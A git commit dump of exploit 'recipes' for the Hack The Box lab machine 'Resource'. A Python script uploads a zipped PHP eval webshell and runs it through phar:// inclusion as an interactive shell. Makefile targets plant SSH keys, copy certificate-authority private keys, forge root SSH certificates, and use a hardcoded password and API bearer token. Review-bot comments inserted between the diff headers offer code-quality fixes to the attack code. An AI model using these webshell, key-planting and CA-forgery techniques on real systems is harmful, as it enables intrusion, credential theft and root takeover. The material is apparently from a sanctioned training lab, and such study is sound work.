htb-season-6-resource

Recipes for HTB Season 6 "Resource"
git clone https://git.y5c4l3.net/htb-season-6-resource.git

commit c59912bc322f02e1dbc9e6f39df0e32032366075
Author: y5c4l3 <y5c4l3@proton.me>
Date:   Thu, 29 Aug 2024 07:51:18 +0800

initial commit

Signed-off-by: y5c4l3 <y5c4l3@proton.me>

Diffstat:
A.gitignore | 0
A.hosts | 1+
ALICENSE | 21+++++++++++++++++++++
AMakefile | 84+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
AREADME.md | 21+++++++++++++++++++++
Aitrc.py | 93+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Apoetry.lock | 165+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Aprobe.sh | 143+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Apyproject.toml | 18++++++++++++++++++
Assh_config | 17+++++++++++++++++
10 files changed, 563 insertions(+), 0 deletions(-)

diff --git a/.gitignore b/.gitignore
diff --git a/.hosts b/.hosts
@@ -0,0 +1 @@
+10.10.11.27 itrc.ssg.htb signserv.ssg.htb
diff --git a/LICENSE b/LICENSE
@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2024 y5c4l3
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
diff --git a/Makefile b/Makefile
@@ -0,0 +1,84 @@
+SELF := ./keys/id_self
+OLDCA := ./itrc/ca-itrc
+SSGCA := ./ssg/ca-it
+
+ATTACHMENTS := ./itrc/itrc.ssg.htb.har \
+ ./itrc/id_bmcgregor.pub \
+ ./itrc/id_mgraham.pub
+
+.PHONY: clean webshell mitrc oldcasign remotesign ssgcasign
+
+all: key
+
+webshell:
+ python3 itrc.py
+
+key: $(SELF)
+$(SELF):
+ ssh-keygen -t ed25519 -q -N '' -C 'recipe@y5' -f "$@"
+
+attachments: $(ATTACHMENTS)
+
+itrc/itrc.ssg.htb.har: itrc/c2f4813259cc57fab36b311c5058cf031cb6eb51.zip
+ unzip $< -d ./itrc
+ touch $@
+itrc/id_bmcgregor.pub: itrc/eb65074fe37671509f24d1652a44944be61e4360.zip
+ unzip $< -d ./itrc
+ mv ./itrc/id_ed25519.pub $@
+ touch $@
+itrc/id_mgraham.pub: itrc/e8c6575573384aeeab4d093cc99c7e5927614185.zip
+ unzip $< -d ./itrc
+ mv ./itrc/id_rsa.pub $@
+ touch $@
+
+itrc/%.zip:
+ wget -O "$@" http://itrc.ssg.htb/uploads/$(shell basename "$@")
+
+mitrcauth: key
+ echo 82yards2closeit
+ ssh msainristil@itrc.ssg.htb 'mkdir -p .ssh; echo $(shell cat $(SELF).pub) >> .ssh/authorized_keys'
+
+oldca: $(OLDCA) $(OLDCA).pub
+itrc/ca-%:
+ scp -F ssh_config mitrc:~/decommission_old_ca/$(shell basename "$@") ./itrc
+
+oldcasign: key oldca
+ ssh-keygen \
+ -s ./$(OLDCA) \
+ -I root@ssg.htb \
+ -n zzinter,msainristil,root \
+ -z 10086 \
+ -V -365d:+365d \
+ $(SELF)
+ mv $(SELF)-cert.pub $(SELF)-itrc.pub
+
+REMOTE_PRINCIPALS := webserver,analytics,support,security,zzinter_temp
+remotesign: $(SELF)-remote.pub
+$(SELF)-remote.pub: $(SELF)
+ curl http://signserv.ssg.htb/v1/sign \
+ -d '{"pubkey": "'"$(shell cat $(SELF).pub)"'", "username": "'"root@ssg.htb"'", "principals": "'"$(REMOTE_PRINCIPALS)"'"}' \
+ -H "Content-Type: application/json" \
+ -H "Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE" \
+ -o $(SELF)-remote.pub
+
+ssgcaprobe: $(SSGCA) $(SSGCA).pub
+$(SSGCA).pub:
+ scp -F ssh_config support@ssg:/etc/ssh/ca-it.pub $@
+$(SSGCA): probe.sh
+ cat probe.sh | ssh -F ssh_config zzinter@ssg 'sh' > $@
+ echo >> $@
+ chmod 600 $@
+
+ssgcasign: ssgcaprobe
+ ssh-keygen \
+ -s $(SSGCA) \
+ -I root@ssg.htb \
+ -n webserver,analytics,support,security,zzinter_temp,root_user \
+ -z 10086 \
+ -V -365d:+365d \
+ $(SELF)
+ mv $(SELF)-cert.pub $(SELF)-ssg.pub
+
+clean:
+ rm $(SELF)
+
diff --git a/README.md b/README.md
@@ -0,0 +1,21 @@
+# htb-season-6-resource
+
+Recipes for HTB Season 6 [Resource](https://app.hackthebox.com/machines/619)
+
+## Dependencies
+
+```
+poetry install
+make key
+```
+
+## Recipes
+
+* `make attachments`: Download sensitive attachments
+* `make webshell`: Enter interactive webshell
+* `make mitrcauth`: Add public key to `msainristil`'s authorized keys
+* `make oldca`: Transfer old CA to local
+* `make oldcasign`: Sign ITRC certificates that can be authenticated as anyone
+* `make remotesign`: Sign SSG certificates (non-root) using online API
+* `make ssgcaprobe`: Probe new SSG CA via Bash glob pattern matching
+* `make ssgcasign`: Sign SSG certificates using probed CA (full principal list)
diff --git a/itrc.py b/itrc.py
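Review bot: Several Makefile recipes leave a bogus target behind when the transfer fails, so a later `make` treats it as up to date: `wget -O "$@"` in `itrc/%.zip` and the `> $@` redirect in `$(SSGCA)` create the file before anything succeeds, and `curl` without `--fail` saves an HTTP error body into `$(SELF)-remote.pub`. A `.DELETE_ON_ERROR:` line near the top plus `--fail` on the curl command addresses that. In the `$(SSGCA)` recipe the private-key file is created under the default umask and only tightened by `chmod 600 $@` two lines later; prefixing the redirect line with `umask 077 &&` closes that window. `.PHONY` lists `mitrc`, which is not a target in this file, and omits `all`, `key`, `attachments`, `mitrcauth`, `oldca` and `ssgcaprobe`.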
@@ -0,0 +1,93 @@
+import io
+import requests
+import zipfile
+import re
+import readline
+
+from urllib.parse import urljoin
+
+class Exploit:
+ def __init__(self, base):
+ self.base = base
+ self.session = requests.Session()
+ self.session.headers = {
+ 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0',
+ }
+ def session():
+ return self.session
+ def prepare(self):
+ self.session.post(f'{self.base}/api/register.php', data={
+ 'user': 'yyy555',
+ 'pass': 'yyy555',
+ 'pass2': 'yyy555',
+ })
+ self.session.post(f'{self.base}/api/login.php', data={
+ 'user': 'yyy555',
+ 'pass': 'yyy555',
+ })
+ def upload(self, content) -> str:
+ res = self.session.post(f'{self.base}/api/create_ticket.php',
+ data={
+ 'subject': 'exploit',
+ 'body': 'exploit',
+ },
+ files={
+ 'attachment': ('attachment.zip', content, 'application/zip'),
+ },
+ )
+
+ res = self.session.get(f'{self.base}')
+
+ PATTERN_TICKET = re.compile(r'id=(\d+)')
+ *_, last = re.finditer(PATTERN_TICKET, res.text)
+ ticket_id = last.group(1)
+
+ res = self.session.get(f'{self.base}/', params={
+ 'page': 'ticket',
+ 'id': ticket_id,
+ })
+
+ PATTERN_HREF = re.compile(r'uploads/(.*?\.zip)')
+ result = re.search(PATTERN_HREF, res.text).group(0)
+
+ return result
+ def include(self, path, method, **kwargs):
+ res = self.session.request(method, f'{self.base}/?page={path}', **kwargs)
+ return res
+
+payload = io.BytesIO()
+shell = b'''
+<?php
+ if (md5($_GET['p'] ?? '') !== 'b90f3171a899adc93d54a5e53bb8a13d')
+ {
+ die(1);
+ }
+ @error_reporting(E_ALL);
+ @ini_set('display_errors', 'on');
+ echo '<output>';
+ eval(file_get_contents('php://input') . ($_GET['c'] ?? ''));
+ echo '</output>';
+?>
+'''
+OUTPUT_PATTERN = re.compile(r'<output>(.*?)</output>', re.MULTILINE | re.DOTALL)
+with zipfile.ZipFile(payload, 'w', compression=zipfile.ZIP_DEFLATED, allowZip64=False) as z:
+ z.writestr('shell.php', shell)
+
+exp = Exploit('http://itrc.ssg.htb')
+exp.prepare()
+path = exp.upload(payload.getvalue())
+print(f'Uploaded at {path}')
+
+path = f'phar://{path}/shell'
+
+readline.parse_and_bind('"\\e[A": history-search-backward')
+readline.parse_and_bind('"\\e[B": history-search-forward')
+while True:
+ line = input('> ')
+ try:
+ res = exp.include(path, 'POST', params={'p': 'yyy555'}, data=line)
+ result = re.findall(OUTPUT_PATTERN, res.text)[0]
+ print(result.strip())
+ except Exception as e:
+ print('Failed to execute')
+ print(e)
diff --git a/poetry.lock b/poetry.lock
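Review bot: In itrc.py, `def session():` inside `Exploit` takes no `self` and is shadowed on every instance by the `self.session` attribute assigned in `__init__`, so it is dead code and can be deleted. Assigning a plain dict with `self.session.headers = {...}` replaces the header mapping that `requests.Session()` sets up and drops its defaults; `self.session.headers.update({...})` keeps them. `urljoin` is imported but never used in the file. The class and the script body have no docstrings; a one-line docstring on `upload` saying that it returns the `uploads/….zip` path matched on the ticket page would document the only method whose return value the script depends on.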
@@ -0,0 +1,165 @@ +# This file is automatically @generated by Poetry 1.8.3 and should not be changed by hand. + +[[package]] +name = "certifi" +version = "2024.7.4" +description = "Python package for providing Mozilla's CA Bundle." +optional = false +python-versions = ">=3.6" +files = [ + {file = "certifi-2024.7.4-py3-none-any.whl", hash = "sha256:c198e21b1289c2ab85ee4e67bb4b4ef3ead0892059901a8d5b622f24a1101e90"}, + {file = "certifi-2024.7.4.tar.gz", hash = "sha256:5a1e7645bc0ec61a09e26c36f6106dd4cf40c6db3a1fb6352b0244e7fb057c7b"}, +] + +[[package]] +name = "charset-normalizer" +version = "3.3.2" +description = "The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet." +optional = false +python-versions = ">=3.7.0" +files = [ + {file = "charset-normalizer-3.3.2.tar.gz", hash = "sha256:f30c3cb33b24454a82faecaf01b19c18562b1e89558fb6c56de4d9118a032fd5"}, + {file = "charset_normalizer-3.3.2-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:25baf083bf6f6b341f4121c2f3c548875ee6f5339300e08be3f2b2ba1721cdd3"}, + {file = "charset_normalizer-3.3.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:06435b539f889b1f6f4ac1758871aae42dc3a8c0e24ac9e60c2384973ad73027"}, + {file = "charset_normalizer-3.3.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:9063e24fdb1e498ab71cb7419e24622516c4a04476b17a2dab57e8baa30d6e03"}, + {file = "charset_normalizer-3.3.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6897af51655e3691ff853668779c7bad41579facacf5fd7253b0133308cf000d"}, + {file = "charset_normalizer-3.3.2-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1d3193f4a680c64b4b6a9115943538edb896edc190f0b222e73761716519268e"}, + {file = "charset_normalizer-3.3.2-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:cd70574b12bb8a4d2aaa0094515df2463cb429d8536cfb6c7ce983246983e5a6"}, + {file = 
"charset_normalizer-3.3.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8465322196c8b4d7ab6d1e049e4c5cb460d0394da4a27d23cc242fbf0034b6b5"}, + {file = "charset_normalizer-3.3.2-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:a9a8e9031d613fd2009c182b69c7b2c1ef8239a0efb1df3f7c8da66d5dd3d537"}, + {file = "charset_normalizer-3.3.2-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:beb58fe5cdb101e3a055192ac291b7a21e3b7ef4f67fa1d74e331a7f2124341c"}, + {file = "charset_normalizer-3.3.2-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:e06ed3eb3218bc64786f7db41917d4e686cc4856944f53d5bdf83a6884432e12"}, + {file = "charset_normalizer-3.3.2-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:2e81c7b9c8979ce92ed306c249d46894776a909505d8f5a4ba55b14206e3222f"}, + {file = "charset_normalizer-3.3.2-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:572c3763a264ba47b3cf708a44ce965d98555f618ca42c926a9c1616d8f34269"}, + {file = "charset_normalizer-3.3.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:fd1abc0d89e30cc4e02e4064dc67fcc51bd941eb395c502aac3ec19fab46b519"}, + {file = "charset_normalizer-3.3.2-cp310-cp310-win32.whl", hash = "sha256:3d47fa203a7bd9c5b6cee4736ee84ca03b8ef23193c0d1ca99b5089f72645c73"}, + {file = "charset_normalizer-3.3.2-cp310-cp310-win_amd64.whl", hash = "sha256:10955842570876604d404661fbccbc9c7e684caf432c09c715ec38fbae45ae09"}, + {file = "charset_normalizer-3.3.2-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:802fe99cca7457642125a8a88a084cef28ff0cf9407060f7b93dca5aa25480db"}, + {file = "charset_normalizer-3.3.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:573f6eac48f4769d667c4442081b1794f52919e7edada77495aaed9236d13a96"}, + {file = "charset_normalizer-3.3.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:549a3a73da901d5bc3ce8d24e0600d1fa85524c10287f6004fbab87672bf3e1e"}, + {file = 
"charset_normalizer-3.3.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f27273b60488abe721a075bcca6d7f3964f9f6f067c8c4c605743023d7d3944f"}, + {file = "charset_normalizer-3.3.2-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1ceae2f17a9c33cb48e3263960dc5fc8005351ee19db217e9b1bb15d28c02574"}, + {file = "charset_normalizer-3.3.2-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:65f6f63034100ead094b8744b3b97965785388f308a64cf8d7c34f2f2e5be0c4"}, + {file = "charset_normalizer-3.3.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:753f10e867343b4511128c6ed8c82f7bec3bd026875576dfd88483c5c73b2fd8"}, + {file = "charset_normalizer-3.3.2-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4a78b2b446bd7c934f5dcedc588903fb2f5eec172f3d29e52a9096a43722adfc"}, + {file = "charset_normalizer-3.3.2-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:e537484df0d8f426ce2afb2d0f8e1c3d0b114b83f8850e5f2fbea0e797bd82ae"}, + {file = "charset_normalizer-3.3.2-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:eb6904c354526e758fda7167b33005998fb68c46fbc10e013ca97f21ca5c8887"}, + {file = "charset_normalizer-3.3.2-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:deb6be0ac38ece9ba87dea880e438f25ca3eddfac8b002a2ec3d9183a454e8ae"}, + {file = "charset_normalizer-3.3.2-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:4ab2fe47fae9e0f9dee8c04187ce5d09f48eabe611be8259444906793ab7cbce"}, + {file = "charset_normalizer-3.3.2-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:80402cd6ee291dcb72644d6eac93785fe2c8b9cb30893c1af5b8fdd753b9d40f"}, + {file = "charset_normalizer-3.3.2-cp311-cp311-win32.whl", hash = "sha256:7cd13a2e3ddeed6913a65e66e94b51d80a041145a026c27e6bb76c31a853c6ab"}, + {file = "charset_normalizer-3.3.2-cp311-cp311-win_amd64.whl", hash = 
"sha256:663946639d296df6a2bb2aa51b60a2454ca1cb29835324c640dafb5ff2131a77"}, + {file = "charset_normalizer-3.3.2-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:0b2b64d2bb6d3fb9112bafa732def486049e63de9618b5843bcdd081d8144cd8"}, + {file = "charset_normalizer-3.3.2-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:ddbb2551d7e0102e7252db79ba445cdab71b26640817ab1e3e3648dad515003b"}, + {file = "charset_normalizer-3.3.2-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:55086ee1064215781fff39a1af09518bc9255b50d6333f2e4c74ca09fac6a8f6"}, + {file = "charset_normalizer-3.3.2-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8f4a014bc36d3c57402e2977dada34f9c12300af536839dc38c0beab8878f38a"}, + {file = "charset_normalizer-3.3.2-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:a10af20b82360ab00827f916a6058451b723b4e65030c5a18577c8b2de5b3389"}, + {file = "charset_normalizer-3.3.2-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:8d756e44e94489e49571086ef83b2bb8ce311e730092d2c34ca8f7d925cb20aa"}, + {file = "charset_normalizer-3.3.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:90d558489962fd4918143277a773316e56c72da56ec7aa3dc3dbbe20fdfed15b"}, + {file = "charset_normalizer-3.3.2-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6ac7ffc7ad6d040517be39eb591cac5ff87416c2537df6ba3cba3bae290c0fed"}, + {file = "charset_normalizer-3.3.2-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:7ed9e526742851e8d5cc9e6cf41427dfc6068d4f5a3bb03659444b4cabf6bc26"}, + {file = "charset_normalizer-3.3.2-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:8bdb58ff7ba23002a4c5808d608e4e6c687175724f54a5dade5fa8c67b604e4d"}, + {file = "charset_normalizer-3.3.2-cp312-cp312-musllinux_1_1_ppc64le.whl", hash = "sha256:6b3251890fff30ee142c44144871185dbe13b11bab478a88887a639655be1068"}, + {file = 
"charset_normalizer-3.3.2-cp312-cp312-musllinux_1_1_s390x.whl", hash = "sha256:b4a23f61ce87adf89be746c8a8974fe1c823c891d8f86eb218bb957c924bb143"}, + {file = "charset_normalizer-3.3.2-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:efcb3f6676480691518c177e3b465bcddf57cea040302f9f4e6e191af91174d4"}, + {file = "charset_normalizer-3.3.2-cp312-cp312-win32.whl", hash = "sha256:d965bba47ddeec8cd560687584e88cf699fd28f192ceb452d1d7ee807c5597b7"}, + {file = "charset_normalizer-3.3.2-cp312-cp312-win_amd64.whl", hash = "sha256:96b02a3dc4381e5494fad39be677abcb5e6634bf7b4fa83a6dd3112607547001"}, + {file = "charset_normalizer-3.3.2-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:95f2a5796329323b8f0512e09dbb7a1860c46a39da62ecb2324f116fa8fdc85c"}, + {file = "charset_normalizer-3.3.2-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c002b4ffc0be611f0d9da932eb0f704fe2602a9a949d1f738e4c34c75b0863d5"}, + {file = "charset_normalizer-3.3.2-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:a981a536974bbc7a512cf44ed14938cf01030a99e9b3a06dd59578882f06f985"}, + {file = "charset_normalizer-3.3.2-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:3287761bc4ee9e33561a7e058c72ac0938c4f57fe49a09eae428fd88aafe7bb6"}, + {file = "charset_normalizer-3.3.2-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:42cb296636fcc8b0644486d15c12376cb9fa75443e00fb25de0b8602e64c1714"}, + {file = "charset_normalizer-3.3.2-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0a55554a2fa0d408816b3b5cedf0045f4b8e1a6065aec45849de2d6f3f8e9786"}, + {file = "charset_normalizer-3.3.2-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:c083af607d2515612056a31f0a8d9e0fcb5876b7bfc0abad3ecd275bc4ebc2d5"}, + {file = "charset_normalizer-3.3.2-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:87d1351268731db79e0f8e745d92493ee2841c974128ef629dc518b937d9194c"}, + {file 
= "charset_normalizer-3.3.2-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:bd8f7df7d12c2db9fab40bdd87a7c09b1530128315d047a086fa3ae3435cb3a8"}, + {file = "charset_normalizer-3.3.2-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:c180f51afb394e165eafe4ac2936a14bee3eb10debc9d9e4db8958fe36afe711"}, + {file = "charset_normalizer-3.3.2-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:8c622a5fe39a48f78944a87d4fb8a53ee07344641b0562c540d840748571b811"}, + {file = "charset_normalizer-3.3.2-cp37-cp37m-win32.whl", hash = "sha256:db364eca23f876da6f9e16c9da0df51aa4f104a972735574842618b8c6d999d4"}, + {file = "charset_normalizer-3.3.2-cp37-cp37m-win_amd64.whl", hash = "sha256:86216b5cee4b06df986d214f664305142d9c76df9b6512be2738aa72a2048f99"}, + {file = "charset_normalizer-3.3.2-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:6463effa3186ea09411d50efc7d85360b38d5f09b870c48e4600f63af490e56a"}, + {file = "charset_normalizer-3.3.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:6c4caeef8fa63d06bd437cd4bdcf3ffefe6738fb1b25951440d80dc7df8c03ac"}, + {file = "charset_normalizer-3.3.2-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:37e55c8e51c236f95b033f6fb391d7d7970ba5fe7ff453dad675e88cf303377a"}, + {file = "charset_normalizer-3.3.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fb69256e180cb6c8a894fee62b3afebae785babc1ee98b81cdf68bbca1987f33"}, + {file = "charset_normalizer-3.3.2-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ae5f4161f18c61806f411a13b0310bea87f987c7d2ecdbdaad0e94eb2e404238"}, + {file = "charset_normalizer-3.3.2-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b2b0a0c0517616b6869869f8c581d4eb2dd83a4d79e0ebcb7d373ef9956aeb0a"}, + {file = "charset_normalizer-3.3.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:45485e01ff4d3630ec0d9617310448a8702f70e9c01906b0d0118bdf9d124cf2"}, + {file = 
"charset_normalizer-3.3.2-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:eb00ed941194665c332bf8e078baf037d6c35d7c4f3102ea2d4f16ca94a26dc8"}, + {file = "charset_normalizer-3.3.2-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:2127566c664442652f024c837091890cb1942c30937add288223dc895793f898"}, + {file = "charset_normalizer-3.3.2-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:a50aebfa173e157099939b17f18600f72f84eed3049e743b68ad15bd69b6bf99"}, + {file = "charset_normalizer-3.3.2-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:4d0d1650369165a14e14e1e47b372cfcb31d6ab44e6e33cb2d4e57265290044d"}, + {file = "charset_normalizer-3.3.2-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:923c0c831b7cfcb071580d3f46c4baf50f174be571576556269530f4bbd79d04"}, + {file = "charset_normalizer-3.3.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:06a81e93cd441c56a9b65d8e1d043daeb97a3d0856d177d5c90ba85acb3db087"}, + {file = "charset_normalizer-3.3.2-cp38-cp38-win32.whl", hash = "sha256:6ef1d82a3af9d3eecdba2321dc1b3c238245d890843e040e41e470ffa64c3e25"}, + {file = "charset_normalizer-3.3.2-cp38-cp38-win_amd64.whl", hash = "sha256:eb8821e09e916165e160797a6c17edda0679379a4be5c716c260e836e122f54b"}, + {file = "charset_normalizer-3.3.2-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:c235ebd9baae02f1b77bcea61bce332cb4331dc3617d254df3323aa01ab47bd4"}, + {file = "charset_normalizer-3.3.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:5b4c145409bef602a690e7cfad0a15a55c13320ff7a3ad7ca59c13bb8ba4d45d"}, + {file = "charset_normalizer-3.3.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:68d1f8a9e9e37c1223b656399be5d6b448dea850bed7d0f87a8311f1ff3dabb0"}, + {file = "charset_normalizer-3.3.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:22afcb9f253dac0696b5a4be4a1c0f8762f8239e21b99680099abd9b2b1b2269"}, + {file = 
"charset_normalizer-3.3.2-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:e27ad930a842b4c5eb8ac0016b0a54f5aebbe679340c26101df33424142c143c"}, + {file = "charset_normalizer-3.3.2-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:1f79682fbe303db92bc2b1136016a38a42e835d932bab5b3b1bfcfbf0640e519"}, + {file = "charset_normalizer-3.3.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b261ccdec7821281dade748d088bb6e9b69e6d15b30652b74cbbac25e280b796"}, + {file = "charset_normalizer-3.3.2-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:122c7fa62b130ed55f8f285bfd56d5f4b4a5b503609d181f9ad85e55c89f4185"}, + {file = "charset_normalizer-3.3.2-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:d0eccceffcb53201b5bfebb52600a5fb483a20b61da9dbc885f8b103cbe7598c"}, + {file = "charset_normalizer-3.3.2-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:9f96df6923e21816da7e0ad3fd47dd8f94b2a5ce594e00677c0013018b813458"}, + {file = "charset_normalizer-3.3.2-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:7f04c839ed0b6b98b1a7501a002144b76c18fb1c1850c8b98d458ac269e26ed2"}, + {file = "charset_normalizer-3.3.2-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:34d1c8da1e78d2e001f363791c98a272bb734000fcef47a491c1e3b0505657a8"}, + {file = "charset_normalizer-3.3.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:ff8fa367d09b717b2a17a052544193ad76cd49979c805768879cb63d9ca50561"}, + {file = "charset_normalizer-3.3.2-cp39-cp39-win32.whl", hash = "sha256:aed38f6e4fb3f5d6bf81bfa990a07806be9d83cf7bacef998ab1a9bd660a581f"}, + {file = "charset_normalizer-3.3.2-cp39-cp39-win_amd64.whl", hash = "sha256:b01b88d45a6fcb69667cd6d2f7a9aeb4bf53760d7fc536bf679ec94fe9f3ff3d"}, + {file = "charset_normalizer-3.3.2-py3-none-any.whl", hash = "sha256:3e4d1f6587322d2788836a99c69062fbb091331ec940e02d12d179c1d53e25fc"}, +] + +[[package]] +name = "idna" +version = "3.8" +description 
= "Internationalized Domain Names in Applications (IDNA)" +optional = false +python-versions = ">=3.6" +files = [ + {file = "idna-3.8-py3-none-any.whl", hash = "sha256:050b4e5baadcd44d760cedbd2b8e639f2ff89bbc7a5730fcc662954303377aac"}, + {file = "idna-3.8.tar.gz", hash = "sha256:d838c2c0ed6fced7693d5e8ab8e734d5f8fda53a039c0164afb0b82e771e3603"}, +] + +[[package]] +name = "requests" +version = "2.32.3" +description = "Python HTTP for Humans." +optional = false +python-versions = ">=3.8" +files = [ + {file = "requests-2.32.3-py3-none-any.whl", hash = "sha256:70761cfe03c773ceb22aa2f671b4757976145175cdfca038c02654d061d6dcc6"}, + {file = "requests-2.32.3.tar.gz", hash = "sha256:55365417734eb18255590a9ff9eb97e9e1da868d4ccd6402399eaf68af20a760"}, +] + +[package.dependencies] +certifi = ">=2017.4.17" +charset-normalizer = ">=2,<4" +idna = ">=2.5,<4" +urllib3 = ">=1.21.1,<3" + +[package.extras] +socks = ["PySocks (>=1.5.6,!=1.5.7)"] +use-chardet-on-py3 = ["chardet (>=3.0.2,<6)"] + +[[package]] +name = "urllib3" +version = "2.2.2" +description = "HTTP library with thread-safe connection pooling, file post, and more." +optional = false +python-versions = ">=3.8" +files = [ + {file = "urllib3-2.2.2-py3-none-any.whl", hash = "sha256:a448b2f64d686155468037e1ace9f2d2199776e17f0a46610480d311f73e3472"}, + {file = 